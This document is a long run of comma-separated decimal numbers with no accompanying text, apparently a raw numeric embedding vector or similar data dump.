0.0026900956872850657, -0.002472250023856759, -0.010104847140610218, -0.01921839639544487, 0.026461267843842506, -0.013174673542380333, -0.015844784677028656, 0.0008938672253862023, -0.007314822170883417, -0.013902159407734871, 0.01734771952033043, 0.021392855793237686, 0.021984437480568886, -0.0004666696477215737, -0.0007174921338446438, -0.047454409301280975, -0.03686990216374397, 0.0206413883715868, 0.006327521055936813, -0.007218889892101288, -0.009113548323512077, 0.014685604721307755, -0.011823629960417747, 0.0031117971520870924, 0.004536788444966078, -0.008945667184889317, 0.027660420164465904, -0.02027364820241928, -0.02737262286245823, 0.009209481067955494, 0.011048179119825363, 0.001571887289173901, -0.016932014375925064, -0.029770925641059875, 0.018898623064160347, 0.026013584807515144, 0.03138578310608864, 0.016180546954274178, -0.03926820307970047, -0.023423418402671814, -0.014693599194288254, 0.012279307469725609, -0.020481500774621964, -0.019266361370682716, -0.026717087253928185, 0.009657164104282856, -0.03290470689535141, -0.014949417673051357, 0.01054453570395708, 0.0027960208244621754, -0.024238841608166695, 0.022144325077533722, -0.019841954112052917, -0.001001790864393115, -0.02076929807662964, 0.0051243724301457405, -0.012151398696005344, -0.023055680096149445, -0.004133074078708887, 0.05173937603831291, -0.02761245332658291, -0.03789317607879639, 0.011639760807156563, -0.0030318538192659616, 0.0103126997128129, -0.045567743480205536, 0.001698797452263534, -0.044416557997465134, 0.01934630610048771, 0.01840297318994999, -0.014237921684980392, 0.01980997622013092, -0.027996182441711426, -0.007015034090727568, 0.0032896713819354773, 0.003103802911937237, -0.007354793604463339, 0.05145157873630524, -0.029051436111330986, 0.0036594097036868334, -0.027500532567501068, 0.012471172027289867, -0.0050124516710639, -0.012695013545453548, 0.0016908030956983566, -0.029914824292063713, 0.005995755549520254, -0.02028963714838028, -0.04892536625266075, -0.020609410479664803, -0.0495329350233078, -0.0069870539009571075, 0.020129751414060593, -0.051835305988788605, 0.025885676965117455, -0.013070747256278992, 0.011000213213264942, 0.002472250023856759, 0.004996463190764189, 0.036614082753658295, -0.006211603060364723, -0.027628442272543907, -0.03360820934176445, -0.008849735371768475, 0.021904494613409042, -0.040291476994752884, 0.032840751111507416, 0.009705130010843277, -0.03138578310608864, 0.029067423194646835, -0.026381324976682663, 0.012575098313391209, 0.030154654756188393, 0.026109518483281136, -0.013910152949392796, -0.0020985144656151533, -0.013918147422373295, -0.026972906664013863, -0.01779540255665779, -0.020193705335259438, 0.01349444780498743, 0.0057599227875471115, -0.007730527780950069, -0.02193647250533104, 0.045567743480205536, -0.03044245019555092, -0.001481950981542468, -0.024686524644494057, -0.01992189697921276, -0.0010792360408231616, -0.008929679170250893, -0.006791192572563887, 0.00040196545887738466, -0.013190662488341331, 0.00504043186083436, 0.015940716490149498, 0.010448603890836239, 0.008825752884149551, 0.017875347286462784, 0.026253415271639824, 0.014461763203144073, -0.04998062178492546, 0.017827380448579788, 0.015540999360382557, -0.010224762372672558, 0.0412827767431736, 0.01373427826911211, -0.024462683126330376, -0.016948003321886063, 0.022256245836615562, 0.004101097118109465, 0.01816314272582531, -0.041314754635095596, -0.007790485396981239, -0.005975769832730293, -0.01944223791360855, -0.024574603885412216, 0.01733173057436943, 0.026093529537320137, -0.007818465121090412, 0.00991298258304596, 0.0194742139428854, -0.016332438215613365, -0.015820801258087158, 0.007618607021868229, 0.0033316416665911674, 0.008210187777876854, -0.0038312878459692, -0.004416873212903738, 0.004400884732604027, -0.009513265453279018, 0.0165163092315197, -0.01992189697921276, -0.0300747100263834, -0.00014664619811810553, 0.0008893704507499933, -0.012647047638893127, -0.02698889560997486, -0.0100169088691473, 0.0033356386702507734, 0.047454409301280975, -0.014589671976864338, -0.03997170552611351, -0.024334773421287537, -0.038500744849443436, -0.012055465951561928, -0.010984224267303944, 0.0035135129000991583, -0.0031517690513283014, -0.006919102277606726, 0.03135380521416664, 0.011144110932946205, 0.003531500231474638, 0.0035614788066595793, 0.013934136368334293, 0.04019554704427719, 0.01899455487728119, 0.008210187777876854, -0.013518430292606354, -0.022831838577985764, -0.004596746060997248, -0.04339328408241272, 0.009089565835893154, 0.014437779784202576, 0.06657686829566956, 0.01781139150261879, 0.015181253664195538, 0.0031517690513283014, 0.015309163369238377, -0.010104847140610218, 0.0010452601127326488, -0.032473012804985046, 0.002220428315922618, 0.0031397773418575525, 0.00521630747243762, 0.02038556896150112, -0.03559080511331558, -0.012511143460869789, 0.011735692620277405, 0.020449524745345116, -0.0017157854745164514, -0.004145065788179636, -0.005999752786010504, 0.005588044412434101, -0.05986162647604942, -0.02252805233001709, 0.023903079330921173, 0.024670535698533058, -0.04080311581492424, -0.008729820139706135, 0.01640438847243786, -0.017763426527380943, -0.014861480332911015, -0.01920240744948387, -0.02171263098716736, -0.01527718547731638, -0.023967035114765167, -0.029547084122896194, -0.04348921403288841, -0.01373427826911211, 0.024798445403575897, -0.01758754998445511, -0.037445493042469025, -0.02427081950008869, 0.03699781000614166, 0.004832579288631678, 0.02499031089246273, -0.024462683126330376, -0.001580880954861641, 0.001200150465592742, 0.00247824564576149, -0.030522393062710762, 0.015764839947223663, -0.024942344054579735, -0.030682280659675598, 0.015253202989697456, -0.01933031715452671, -0.004352918826043606, 0.0377332903444767, -0.0034075877629220486, -0.004452847875654697, -0.017155855894088745, -0.033192504197359085, -0.012750973924994469, -0.018067210912704468, -0.012095438316464424, -0.03148171305656433, 0.019889920949935913, -0.026013584807515144, -0.0036474179942160845, -0.02724471502006054, -0.0039851791225373745, 0.01255910936743021, 0.02465454675257206, 0.029674993827939034, 0.001341050723567605, 0.007190909702330828, 0.02973894774913788, -0.04316944256424904, 0.0436171256005764, -0.017731448635458946, -0.002941917395219207, -0.01792331226170063, -0.018323030322790146, -0.023855114355683327, -0.05020446330308914, -0.004856562241911888, 0.03901238366961479, 0.004360912833362818, -0.017299754545092583, 0.013926141895353794, 0.016708172857761383, 0.034375667572021484, -0.035079170018434525, -0.02206438034772873, -0.004428864922374487, -0.0009123541531153023, 0.016012664884328842, -0.0019216396613046527, 0.01980997622013092, 0.0017247790237888694, 0.003265688195824623, -0.018418962135910988, 0.011767669580876827, 0.049213163554668427, -0.009209481067955494, -0.023647259920835495, -0.007234878838062286, -0.028028160333633423, 0.009273435920476913, 0.028252001851797104, -0.010056881234049797, 0.0011671737302094698, 0.02570980042219162, 0.009569225832819939, 0.0013490450801327825, -0.007646587211638689, -0.01640438847243786, 0.01971404440701008, -0.0223841555416584, -0.020129751414060593, 0.018562858924269676, -0.014509729109704494, -0.0009363371646031737, -0.002684100065380335, 0.029179343953728676, 0.008402052335441113, -0.034375667572021484, -0.018690768629312515, -0.003205730812624097, -0.0005660992464981973, 0.024926355108618736, 0.031817477196455, 0.02112104929983616, 0.003535497235134244, 0.007118960842490196, -0.0072228871285915375, 0.06561755388975143, -0.01686805859208107, -0.0043049524538218975, -0.01019278448075056, -0.0037793247029185295, -0.0012221349170431495, 0.016484331339597702, 0.001410001888871193, 0.013286594301462173, -0.015517015941441059, 0.007162929512560368, -0.015493032522499561, -0.016468342393636703, -0.01568489708006382, -0.009889000095427036, 0.01008885819464922, -0.010808348655700684, 0.0005346215330064297, 0.001117209205403924, -0.00009661910735303536, -0.029323242604732513, -0.0066672805696725845, 0.036965832114219666, -0.020497489720582962, 0.012950832024216652, -0.0052522821351885796, -0.023183589801192284, -0.02735663577914238, -0.0036933855153620243, -0.012183375656604767, -0.0015039354329928756, 0.0035714718978852034, -0.04633520171046257, -0.00542815774679184, -0.009952954947948456, -0.011224054731428623, 0.010704422369599342, -0.015405095182359219, -0.026381324976682663, -0.017779413610696793, -0.006123665254563093, -0.016804104670882225, -0.0014559694100171328, -0.009169508703052998, 0.031050020828843117, 0.07239675521850586, 0.038372837007045746, -0.008737814612686634, -0.027148781344294548, -0.031097985804080963, -0.001825707615353167, 0.0053002480417490005, -0.003857269650325179, -0.002340343315154314, -0.017123878002166748, 0.029035447165369987, -0.00755065493285656, -0.0015129289822652936, 0.0002444519486743957, 0.01055253017693758, 0.017155855894088745, -0.022112347185611725, -0.01054453570395708, 0.02511821873486042, -0.007590626832097769, -0.015660913661122322, 0.005799894221127033, 0.02828397788107395, 0.01315069105476141, -0.019154440611600876, 0.0021224976517260075, 0.013710294850170612, 0.01067244540899992, -0.004484825301915407, -0.016452353447675705, 0.011759676039218903, 0.005663990508764982, -0.011104139499366283, -0.005887832026928663, 0.00991298258304596, -0.011104139499366283, 0.01557297632098198, 0.005811885930597782, 0.006103679537773132, -0.03581464663147926, 0.006907110568135977, 0.0075226747430861, -0.0028299966361373663, -0.0052123102359473705, 0.013278600759804249, -0.02156873233616352, 0.02393505722284317, -0.004436859395354986, -0.024926355108618736, -0.011719703674316406, -0.0028439867310225964, -0.0341518260538578, -0.0023903080727905035, 0.04291362315416336, -0.004105093888938427, 0.02642929181456566, 0.003697382751852274, -0.005552069749683142, -0.013054759241640568, -0.005763920024037361, -0.004732649773359299, 0.0032996642403304577, 0.009089565835893154, -0.0006755217909812927, 0.040035661309957504, 0.004332932643592358, -0.016788115724921227, 0.0008134241797961295, -0.01827506348490715, 0.003717368468642235, 0.015724869444966316, -0.0032257165294140577, 0.008865724317729473, -0.006319526582956314, 0.03146572783589363, 0.03152967989444733, 0.0017487620934844017, 0.02051347866654396, -0.030490417033433914, -0.022432120516896248, 0.014070040546357632, 0.009777079336345196, 0.013966113328933716, 0.017283765599131584, -0.022671950981020927, 0.024830423295497894, 0.015852777287364006, 0.004640714731067419, -0.014725576154887676, -0.0100169088691473, -0.0103206941857934, -0.01934630610048771, 0.03205730766057968, 0.023903079330921173, 0.013654334470629692, 0.028731660917401314, -0.020433535799384117, -0.0016728158807381988, -0.018962576985359192, -0.00865787174552679, 0.008673859760165215, 0.014133994467556477, 0.00533622270449996, 0.01814715377986431, -0.02639731392264366, -0.01302278134971857, 0.019122464582324028, 0.024318784475326538, -0.021632686257362366, -0.010128829628229141, -0.040611252188682556, 0.0026441283989697695, -0.01068043988198042, -0.017283765599131584, -0.010720411315560341, -0.016676194965839386, -0.009201486594974995, 0.007023028563708067, -0.00036024500150233507, -0.006895119324326515, -0.020129751414060593, -0.025070253759622574, 0.003055836772546172, -0.017667492851614952, -0.01675613783299923, -0.004612734541296959, -0.025661835446953773, -0.01550902146846056, 0.05014050751924515, 0.0001816214353311807, 0.009257446974515915, 0.006671277340501547, 0.023631272837519646, -0.015916733071208, -0.000588583352509886, -0.018450938165187836, 0.0025182173121720552, 0.010216767899692059, -0.016676194965839386, 0.005636010318994522, -0.000047622539568692446, 0.02289579249918461, 0.02076929807662964, 0.023791158571839333, 0.017667492851614952, -0.009449311532080173, -0.018722746521234512, 0.00801832415163517, 0.0018357005901634693, 0.011911568231880665, 0.019650090485811234, -0.035334985703229904, 0.022703928872942924, 0.01492543425410986, 0.006607322953641415, -0.0026621154975146055, 0.004744641482830048, -0.0075346664525568485, -0.0079663610085845, 0.011551822535693645, 0.03338436782360077, 0.018658792600035667, 0.02499031089246273, -0.005472126416862011, -0.006439441815018654, 0.009481288492679596, 0.01510130986571312, -0.057367391884326935, 0.0002491986087989062, -0.026205450296401978, -0.006379484198987484, 0.023439407348632812, -0.009753095917403698, -0.006519385147839785, 0.005380191374570131, 0.017059924080967903, -0.016188541427254677, -0.008170216344296932, 0.0014669615775346756, -0.013046764768660069, 0.009025610983371735, 0.03168956935405731, -0.018466927111148834, 0.022496076300740242, 0.028363922610878944, -0.014685604721307755, 0.01321464590728283, 0.005951786879450083, -0.03760537877678871, 0.03204131871461868, 0.0109122758731246, 0.02807612530887127, -0.019730033352971077, 0.0011671737302094698, -0.022847827523946762, -0.01344648189842701, 0.014805519953370094, -0.004548780154436827, 0.013662328943610191, 0.019857943058013916, 0.003457552520558238, 0.015341140329837799, -0.00040271494071930647, 0.01073640026152134, 0.008809763938188553, -0.03559080511331558, 0.020001841709017754, 0.0029099402017891407, -0.021025117486715317, -0.003753343131393194, 0.0012920853914692998, 0.003473541233688593, 0.009801061823964119, -0.026125505566596985, 0.026829008013010025, -0.0100328978151083, 0.03293668478727341, -0.018946588039398193, 0.007330810651183128, 0.01049656979739666, -0.013830210082232952, 0.01921839639544487, 0.0034755398519337177, 0.011128122918307781, -0.018562858924269676, 0.01079236064106226, 0.015588965266942978, -0.004884542431682348, -0.01303877029567957, 0.006903113331645727, 0.016244500875473022, 0.01556498184800148, 0.01014481857419014, -0.0012521136086434126, -0.003937212750315666, 0.002981889294460416, -0.007326813414692879, -0.02241613157093525, 0.009025610983371735, -0.021488789469003677, -0.00043494210694916546, 0.00260815373621881, -0.010176796466112137, -0.004784612916409969, -0.01897856593132019, -0.00021147530060261488, 0.018450938165187836, 0.009353378787636757, -0.0017487620934844017, 0.0017627521883696318, -0.02746855653822422, -0.011359958909451962, -0.0013350549852475524, 0.004276972264051437, -0.001140192849561572, 0.011815636418759823, 0.007426742929965258, 0.0014519721735268831, 0.016356421634554863, -0.0012691016308963299, 0.015636930242180824, -0.0014619651483371854, -0.009753095917403698, 0.02722872607409954, -0.028923526406288147, 0.017411675304174423, -0.025166185572743416, -0.014741565100848675, 0.004744641482830048, 0.010296710766851902, 0.0036634067073464394, -0.002985886298120022, 0.008593916893005371, 0.027020873501896858, -0.01685207150876522, 0.017011957243084908, 0.003665405325591564, -0.02806013636291027, -0.018482916057109833, 0.00193862768355757, -0.010928263887763023, 0.03623035177588463, -0.02251206338405609, -0.0014789530541747808, 0.0007539662765339017, 0.005004457663744688, -0.0330645926296711, -0.009041599929332733, 0.000012303790754231159, 0.005975769832730293, 0.006615316960960627, -0.005803891457617283, -0.025805732235312462, -0.021312912926077843, 0.017667492851614952, -0.010808348655700684, -0.026461267843842506, 0.047230567783117294, -0.016116591170430183, -0.00500845443457365, 0.017955290153622627, 0.0038432793226093054, 0.007430740166455507, 0.03325645998120308, -0.0023743193596601486, 0.03170555457472801, -0.006795189809054136, 0.0008359082858078182, -0.0038093035109341145, 0.0007274850504472852, -0.0014269899111241102, -0.03079420141875744, 0.0006065706256777048, 0.0033915992826223373, 0.0028120095375925303, 0.006751221138983965, -0.017955290153622627, 0.008162221871316433, -0.011983517557382584, -0.0039052355568856, 0.010928263887763023, -0.015077327378094196, 0.010712416842579842, -0.01628447324037552, -0.01244718860834837, 0.00043194423778913915, -0.006963070947676897, 0.026333360001444817, 0.010576513595879078, -0.02335946448147297, 0.020321615040302277, 0.018019244074821472, 0.003071825485676527, 0.007794482633471489, 0.00790240615606308, -0.002208436606451869, -0.008681854233145714, 0.006839158944785595, -0.027804318815469742, -0.004336929880082607, 0.0073587908409535885, 0.021216981112957, -0.011999505572021008, 0.005743933841586113, 0.010536541230976582, 0.022815849632024765, 0.01875472441315651, -0.006859144661575556, 0.009625186212360859, -0.002746056066825986, -0.03706176578998566, -0.005775911267846823, -0.014165972359478474, -0.0065873367711901665, 0.012023488990962505, 0.006103679537773132, 0.010688434354960918, 0.0011292006820440292, 0.01933031715452671, -0.01285490021109581, -0.013406509533524513, 0.004009162075817585, 0.011351964436471462, -0.0028519812040030956, 0.003457552520558238, 0.008106261491775513, -0.015477044507861137, -0.017651505768299103, -0.011407924816012383, -0.0016608242876827717, -0.0014199948636814952, 0.003429572330787778, 0.005020446144044399, 0.008849735371768475, -0.0036634067073464394, 0.00814223662018776, -0.0021244960371404886, -0.012343262322247028, -0.011064168065786362, -0.0012820924166589975, 0.00495649129152298, -0.010616485029459, -0.008394057862460613, 0.0019726036116480827, -0.0043569160625338554, 0.018466927111148834, -0.012231341563165188, 0.01969805546104908, -0.01685207150876522, 0.0028379911091178656, 0.009761090390384197, 0.014821507968008518, -0.008865724317729473, 0.03447159752249718, 0.013254617340862751, -0.0019396269926801324, 0.0056719849817454815, -0.004976477473974228, -0.023439407348632812, -0.01067244540899992, 0.006027732975780964, 0.03111397475004196, 0.009865016676485538, 0.013222640380263329, -0.010528546757996082, -0.0022923771757632494, -0.01286289468407631, -0.04822186380624771, 0.017299754545092583, 0.021440822631120682, 0.0022164310794323683, 0.014765547588467598, 0.02663714438676834, -0.02583771012723446, -0.01315069105476141, -0.003739353036507964, -0.023903079330921173, -0.027532510459423065, 0.01085631549358368, -0.007366785313934088, 0.01256710384041071, 0.02889154851436615, -0.01539710070937872, -0.014813513495028019, 0.006143650971353054, -0.007426742929965258, 0.023679237812757492, -0.013470464386045933, 0.0037053769920021296, 0.017763426527380943, 0.0006345508154481649, 0.030858157202601433, 0.011383941397070885, 0.023791158571839333, -0.02110506035387516, -0.006611320190131664, 0.014118006452918053, -0.002935921773314476, -0.012591087259352207, 0.00006186246173456311, -0.0024502654559910297, -0.01025673933327198, 0.0012501151068136096, 0.00044368591625243425, -0.006351504009217024, -0.018243085592985153, 0.002624142449349165, 0.0054481434635818005, -0.024830423295497894, -0.00749069731682539, 0.0271327942609787, 0.006887124851346016, 0.003623435040935874, 0.0008014327031560242, -0.010712416842579842, -0.009425328113138676, 0.008969650603830814, -0.0039552003145217896, -0.0029619033448398113, 0.001615856192074716, 0.012814928777515888, -0.0200657956302166, 0.028971491381525993, 0.008174213580787182, 0.00504043186083436, 0.003799310652539134, -0.004348921589553356, -0.007226884365081787, -0.009697135537862778, -0.02168065309524536, 0.029195332899689674, -0.009265441447496414, 0.015916733071208, -0.0064034671522676945, 0.004133074078708887, 0.012023488990962505, -0.002180456416681409, -0.01373427826911211, -0.010512558743357658, 0.0019056510645896196, -0.002963901963084936, 0.022256245836615562, -0.0170919019728899, -0.005659993272274733, -0.0035554831847548485, 0.010896286927163601, 0.01829105243086815, 0.009241458028554916, 0.012878883630037308, 0.011807641945779324, 0.003637425135821104, 0.0016188540030270815, -0.024238841608166695, 0.011919562704861164, -0.00542416051030159, 0.008182208053767681, -0.006143650971353054, 0.011823629960417747, 0.01545306108891964, -0.01044060941785574, 0.008737814612686634, 0.002174460794776678, 0.026333360001444817, 0.007294835988432169, -0.006759215146303177, -0.009233463555574417, -0.011168094351887703, 0.001304076868109405, 0.010008915327489376, -0.01020877342671156, 0.015061338432133198, 0.020817263051867485, 0.0031637605279684067, 0.0259336419403553, 0.0017247790237888694, 0.01356639713048935, 0.006111673545092344, -0.0017387691186740994, -0.02475048042833805, -0.008521967567503452, 0.008458012714982033, -0.0009058587602339685, 0.0021864522714167833, -0.01566890813410282, -0.007742519490420818, 0.017843369394540787, -0.0006285550771281123, 0.010400637984275818, -0.004912522621452808, 0.0051243724301457405, -0.0073587908409535885, -0.005691970698535442, -0.0030778213404119015, 0.00029753937269560993, -0.0003579965850804001, 0.0022444112692028284, 0.02961103990674019, -0.0005990759236738086, -0.017187833786010742, -0.00548411812633276, 0.0015319156227633357, -0.01498139463365078, 0.005991758778691292, 0.015125293284654617, -0.00024969823425635695, -0.005640007555484772, 0.0027720376383513212, -0.018083199858665466, -0.0020065796561539173, 0.013302583247423172, 0.0022404140327125788, -0.0031078001484274864, -0.02417488768696785, -0.014221932739019394, -0.009745101444423199, 0.011415919288992882, 0.008609904907643795, -0.012159392237663269, -0.01990590989589691, 0.001878670183941722, 0.009169508703052998, -0.0012990804389119148, 0.023535339161753654, 0.016092607751488686, 0.02230421081185341, -0.0006320526008494198, -0.003355624619871378, 0.014333853498101234, -0.0007394765270873904, -0.003875256748870015, -0.014933428727090359, 0.00004081485894857906, -0.0002972895454149693, 0.011296004056930542, -0.004796604625880718, 0.014853485859930515, -0.013766255229711533, 0.007158932276070118, 0.020193705335259438, -0.008913690224289894, 0.0005840865196660161, 0.00006470419612014666, -0.028699684888124466, -0.0010492572328075767, -0.009257446974515915, -0.011711709201335907, -0.0008788778795860708, -0.02108907140791416, -0.029754936695098877, -0.01626048982143402, 0.014349842444062233, 0.021025117486715317, -0.01617255248129368, -0.005412168800830841, -0.0023483375553041697, -0.0016728158807381988, -0.008474001660943031, -0.015525010414421558, -0.007714539300650358, 0.01545306108891964, 0.0053002480417490005, 0.011503856629133224, -0.019873932003974915, -0.007126954849809408, -0.013526424765586853, -0.00039247216773219407, 0.006611320190131664, 0.0008269146201200783, -0.024462683126330376, -0.01909048669040203, 0.00991298258304596, -0.01008086372166872, 0.012399222701787949, 0.004588751588016748, -0.010392643511295319, 0.009665158577263355, 0.01008885819464922, 0.014269898645579815, -0.01944223791360855, -0.020801275968551636, 0.009777079336345196, -0.010992218740284443, 0.00015001880819909275, -0.01862681470811367, 0.021792573854327202, 0.013686311431229115, 0.008442023769021034, -0.02241613157093525, 0.005739937070757151, -0.003295667003840208, 0.024478672072291374, 0.023855114355683327, 0.01079236064106226, 0.007858437485992908, 0.006583340000361204, 0.021025117486715317, -0.01262306421995163, -0.009585214778780937, -0.01792331226170063, -0.009609198197722435, 0.010424620471894741, -0.013806226663291454, 0.0026860986836254597, -0.003531500231474638, -0.009992926381528378, 0.0016418377636000514, -0.006247577723115683, -0.025166185572743416, 0.004816590342670679, 0.00801032967865467, 0.01628447324037552, -0.0026061551179736853, 0.003925221506506205, 0.021185003221035004, 0.0003402591391932219, -0.03725362941622734, 0.003399593522772193, -0.030730247497558594, -0.02391906827688217, 0.0259496308863163, 0.010456598363816738, 0.007130952086299658, 0.014965406619012356, 0.0156209422275424, 0.013966113328933716, 0.005775911267846823, 0.003805306274443865, 0.0165163092315197, 0.009425328113138676, 0.012519137933850288, -0.0016758136916905642, 0.004776618909090757, -0.014381819404661655, 0.004512805491685867, 0.008569933474063873, -0.03386402875185013, -0.018418962135910988, -0.001987593015655875, -0.009817050769925117, -0.0068631418980658054, -0.006771206855773926, -0.02794821560382843, 0.003223717911168933, -0.009889000095427036, 0.005548072513192892, -0.028971491381525993, 0.00007026276580290869, -0.017363708466291428, 0.002820003777742386, 0.0018956580897793174, 0.011216060258448124, 0.006771206855773926, -0.0013930138666182756, -0.004069119691848755, 0.004336929880082607, -0.034599509090185165, -0.02356731705367565, 0.022496076300740242, 0.0002073532232316211, -0.017891334369778633, 0.004748638719320297, -0.011447896249592304, -0.019506191834807396, 0.009561232291162014, -0.02393505722284317, 0.008977645076811314, 0.008849735371768475, 0.02946714125573635, -0.011407924816012383, 0.012103431858122349, 0.027292679995298386, -0.0009773081401363015, 0.018466927111148834, -0.003457552520558238, -0.0033876020461320877, 0.015189248137176037, -0.0003000376163981855, -0.015932722017169, 0.0265412125736475, -0.008114255964756012, -0.014653626829385757, 0.015285179950296879, 0.006415458861738443, -0.025901664048433304, 0.009169508703052998, -0.0029718962032347918, -0.005755925551056862, -0.006655288860201836, -0.009713124483823776, -0.0002349586720811203, 0.017475629225373268, 0.00825815461575985, 0.02866770699620247, 0.005084400996565819, -0.000031665083952248096, -0.016916025429964066, 0.01048857532441616, -0.03629430755972862, -0.001239122822880745, 0.00013415503781288862, 0.0377013124525547, -0.007514680735766888, 0.001520923338830471, 0.005859851837158203, -0.015980686992406845, 0.0010147816501557827, 0.004173045977950096, 0.0330645926296711, -0.03747747093439102, 0.005260276608169079, -0.018818678334355354, -0.00038322873297147453, 0.0015109304804354906, 0.005655996035784483, -0.004808596335351467, -0.006015741731971502, 0.0076625756919384, -0.02345539629459381, 0.005767917260527611, -0.0060796961188316345, 0.007510683499276638, -0.0004791608080267906, 0.01309473067522049, 0.006223594304174185, 0.030490417033433914, 0.013926141895353794, -0.015612947754561901, -0.021888505667448044, -0.0058558546006679535, -0.009273435920476913, -0.006823169998824596, -0.006947082467377186, 0.020961161702871323, -0.008777786046266556, 0.001571887289173901, -0.013798232190310955, 0.01113611739128828, -0.004141068551689386, -0.020209694281220436, -0.0014869474107399583, 0.030218608677387238, -0.01067244540899992, 0.0034255750942975283, 0.014173966832458973, 0.021776584908366203, 0.005703962408006191, 0.00017874846525955945, 0.0016718165716156363, 0.025773756206035614, -0.0051163784228265285, -0.015253202989697456, -0.0041690487414598465, 0.01817913167178631, 0.00542016327381134, -0.008713832125067711, -0.017299754545092583, 0.011112133972346783, 0.010224762372672558, 0.007978352718055248, -0.004452847875654697, -0.00802631862461567, -0.02324754372239113, -0.004748638719320297, 0.010800355114042759, 0.015596959739923477, -0.0017297755694016814, -0.00530424527823925, 0.022432120516896248, 0.0206413883715868, -0.0016997967613860965, -0.027164770290255547, 0.018722746521234512, -0.01685207150876522, 0.004320941399782896, 0.0002827998250722885, -0.0008543952135369182, -0.018019244074821472, 0.01273498497903347, 0.02110506035387516, -0.00801432691514492, -0.003223717911168933, -0.015341140329837799, 0.006687266286462545, -0.016308454796671867, 0.01685207150876522, -0.01696399226784706, 0.006751221138983965, -0.009449311532080173, 0.007678564637899399, -0.0030058722477406263, -0.012375240214169025, 0.010448603890836239, 0.01779540255665779, -0.023663248866796494, 0.009417333640158176, -0.008633888326585293, -0.011623771861195564, -0.009241458028554916, -0.0018197118770331144, 0.017539585009217262, -0.012151398696005344, 0.008122250437736511, 0.02027364820241928, 0.0103126997128129, 0.006155642680823803, -0.022959748283028603, 0.012095438316464424, -0.02027364820241928, 0.002907941583544016, -0.023631272837519646, -0.002490237122401595, 0.00763859273865819, -0.0025382032617926598, 0.00489653367549181, 0.012870889157056808, 0.009225469082593918, 0.00757863512262702, -0.020705342292785645, -0.007942377589643002, -0.020193705335259438, 0.013366538099944592, 0.018083199858665466, 0.01674015074968338, -0.012703008018434048, 0.00007794482371537015, 0.01303077582269907, 0.0012201362987980247, 0.006935090757906437, -0.03686990216374397, -0.005548072513192892, 0.002012575278058648, -0.018019244074821472, 0.025054264813661575, 0.0052123102359473705, 0.00808627624064684, 0.009241458028554916, -0.007023028563708067, -0.023663248866796494, -0.03702978789806366, 0.007918395102024078, 0.008881713263690472, 0.010008915327489376, -0.015021366998553276, -0.0200498066842556, 0.0103126997128129, -0.012119420804083347, 0.005823877640068531, -0.0006275557680055499, -0.004664698150008917, -0.027036860585212708, -0.012263319455087185, 0.001869676518253982, -0.0016328440979123116, 0.03511114418506622, 0.03146572783589363, 0.007206898648291826, -0.01720382273197174, 0.0031197916250675917, -0.014213938266038895, 0.011639760807156563, -0.0070749917067587376, -0.023487374186515808, -0.006911107804626226, 0.04342526197433472, 0.0023203573655337095, 0.015580970793962479, 0.004372904542833567, -0.012639053165912628, -0.003323647193610668, 0.03597453609108925, 0.02395104616880417, 0.02169664204120636, 0.0005191325326450169, -0.0055440752767026424, 0.02572578936815262, 0.009017616510391235, -0.008633888326585293, -0.01625249534845352, -0.027916239574551582, -0.0031117971520870924, 0.018019244074821472, -0.00044718343997374177, 0.0008449018932878971, 0.019985852763056755, 0.001087230397388339, -0.0023043688852339983, -0.006983056664466858, -0.01239122822880745, 0.0008928679744713008, -0.009873011149466038, -0.0037233643233776093, 0.009057587943971157, 0.005915812216699123, 0.007290839217603207, -0.009625186212360859, 0.0002910439798142761, 0.008673859760165215, -0.024334773421287537, -0.04137871041893959, -0.011104139499366283, 0.026717087253928185, -0.01379023864865303, -0.006311532109975815, -0.008593916893005371, 0.011487867683172226, -0.005695967935025692, 0.014189954847097397, 0.0312418844550848, 0.013950125314295292, 0.009513265453279018, -0.020241672173142433, -0.007274850271642208, -0.016300462186336517, 0.004500813782215118, 0.0005008954321965575, -0.004612734541296959, -0.010216767899692059, -0.000893367629032582, 0.011327981017529964, -0.02088121883571148, -0.012143404223024845, -0.03160962462425232, 0.010048886761069298, 0.006559356581419706, -0.003295667003840208, 0.001267103012651205, -0.02310364507138729, -0.018658792600035667, 0.006271560676395893, 0.013486453332006931, -0.00778249092400074, -0.022336188703775406, 0.028108103200793266, -0.02794821560382843, 0.011671737767755985, 0.018706757575273514, -8.314427191180584e-7, -0.008857729844748974, 0.019074497744441032, 0.006423452869057655, 0.0026801028288900852, -0.0018167139496654272, -0.04537587985396385, -0.0063634952530264854, -0.006091687828302383, -0.0070869834162294865, -0.01829105243086815, -0.014621649868786335, 0.01510130986571312, -0.003115794388577342, -0.004756632726639509, -0.011407924816012383, -0.006387478671967983, -0.00775451073423028, 0.019538169726729393, -0.014102017506957054, 0.0015688894782215357, -0.002746056066825986, 0.01971404440701008, -0.02852380834519863, -0.005112381186336279, -0.004992465954273939, 0.013302583247423172, 0.009609198197722435, 0.0046766893938183784, 0.013254617340862751, -0.005416166037321091, 0.01955415867269039, 0.007978352718055248, -0.0014050054596737027, 0.00539218308404088, 0.026125505566596985, -0.008577927947044373, -0.0002573178499005735, 0.004312946926802397, -0.009233463555574417, 0.0007304829196073115, 0.013046764768660069, 0.008561939001083374, 0.012335267849266529, 0.0038312878459692, 0.01239122822880745, 0.016676194965839386, -0.01520523615181446, -0.03250499069690704, -0.031050020828843117, -0.014805519953370094, -0.03266487643122673, 0.013638345524668694, -0.012423206120729446, 0.006327521055936813, 0.0037513445131480694, -0.001964609371498227, 0.01793930120766163, 0.012639053165912628, -0.0035235057584941387, -0.009665158577263355, 0.009729113429784775, 0.012183375656604767, -0.014086028560996056, -0.003927220124751329, -0.00010005417425418273, -0.018355006352066994, 0.02017771638929844, 0.016484331339597702, -0.012703008018434048, 0.013006792403757572, 0.004732649773359299, -0.022719917818903923, 0.00853795651346445, -0.010688434354960918, 0.005376194138079882, -0.003113795770332217, -0.009233463555574417, -0.012463177554309368, -0.004268978256732225, 0.01875472441315651, 0.03207329660654068, -0.0060796961188316345, 0.01696399226784706, -0.014621649868786335, -0.00265412125736475, -0.014509729109704494, 0.004097099881619215, 0.02734064683318138, 0.0006550363032147288, -0.01373427826911211, 0.014917440712451935, -0.0006800186238251626, -0.001304076868109405, 0.006911107804626226, 0.006555359810590744, -0.022911781445145607, 0.011487867683172226, 0.009992926381528378, -0.01274297945201397, -0.009625186212360859, -0.01733173057436943, -0.005691970698535442, 0.0018317033536732197, -0.008721825666725636, -0.0007144942064769566, 0.009129537269473076, -0.004031146410852671, 0.028459854423999786, 0.0033656174782663584, -0.019314328208565712, -0.004564768634736538, 0.012487160973250866, 0.01979398913681507, -0.010472586378455162, 0.00022621486277785152, -0.002262398600578308, -0.007410753984004259, 